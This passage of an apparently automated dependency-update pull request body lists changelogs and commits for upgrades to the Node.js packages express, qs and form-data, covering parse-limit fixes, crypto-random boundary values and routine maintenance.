href=\"https://github.com/expressjs/express/commit/7fea74fcf02764580f38f2a7f1932dfa54cddd90\"\u003e\u003ccode\u003e7fea74f\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6905\"\u003e#6905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/dac7a0475a99e9dfc57b3b8e6d5bdf52813f1944\"\u003e\u003ccode\u003edac7a04\u003c/code\u003e\u003c/a\u003e chore: wider range for query test skip (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6513\"\u003e#6513\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/997919b48879bbd53171c3b4e5dd1b04ad139241\"\u003e\u003ccode\u003e997919b\u003c/code\u003e\u003c/a\u003e ci: add node.js 24 to test matrix (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6506\"\u003e#6506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/36fb59c6c7d9dfca0b08dfeafb5b6e4a249234a1\"\u003e\u003ccode\u003e36fb59c\u003c/code\u003e\u003c/a\u003e fix(ci): reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6336\"\u003e#6336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.1 to 6.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use \u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e[Fix] fix regressions from robustness refactor\n[actions] update reusable workflows\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: avoid a crash when a \u003ccode\u003efilter\u003c/code\u003e key is \u003ccode\u003enull\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eutils.merge\u003c/code\u003e: functions should not be stringified into keys\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: avoid a crash with interpretNumericEntities: true, comma: true, and iso charset\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: ensure a non-string \u003ccode\u003efilter\u003c/code\u003e does not crash\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003e__proto__\u003c/code\u003e syntax instead of \u003ccode\u003eObject.create\u003c/code\u003e for null objects\u003c/li\u003e\n\u003cli\u003e[Refactor] misc cleanup\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/bdcf0c7f82387c18ac8fabfccd2f440645cef47b\"\u003e\u003ccode\u003ebdcf0c7\u003c/code\u003e\u003c/a\u003e v6.14.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/294db90c812ddbe7d7a35d5687c505fd21a2d6a2\"\u003e\u003ccode\u003e294db90\u003c/code\u003e\u003c/a\u003e [readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5c308e5516c270a78caa6f278465914090f91ec6\"\u003e\u003ccode\u003e5c308e5\u003c/code\u003e\u003c/a\u003e [readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/6addf8cf738d529c54d91f6f3ffb6c1be91bbfdc\"\u003e\u003ccode\u003e6addf8c\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/cfc108f662326d6ab540f3545ef0b832baf83cdf\"\u003e\u003ccode\u003ecfc108f\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/`pars...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/febb64442a80e49200211fa38d3c96b58024ac77\"\u003e\u003ccode\u003efebb644\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when `thr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\"\u003e\u003ccode\u003ef6a7abf\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/fbc5206c25b4d1851cea683f02c10756c521d15a\"\u003e\u003ccode\u003efbc5206\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1b9a8b4e78c6aff4c22fa559107227f02fd0216a\"\u003e\u003ccode\u003e1b9a8b4\u003c/code\u003e\u003c/a\u003e [actions] fix rebase workflow permissions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/2a35775614e0fb46ac8a3060201a32a7c23a7fda\"\u003e\u003ccode\u003e2a35775\u003c/code\u003e\u003c/a\u003e [meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.1...v6.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set 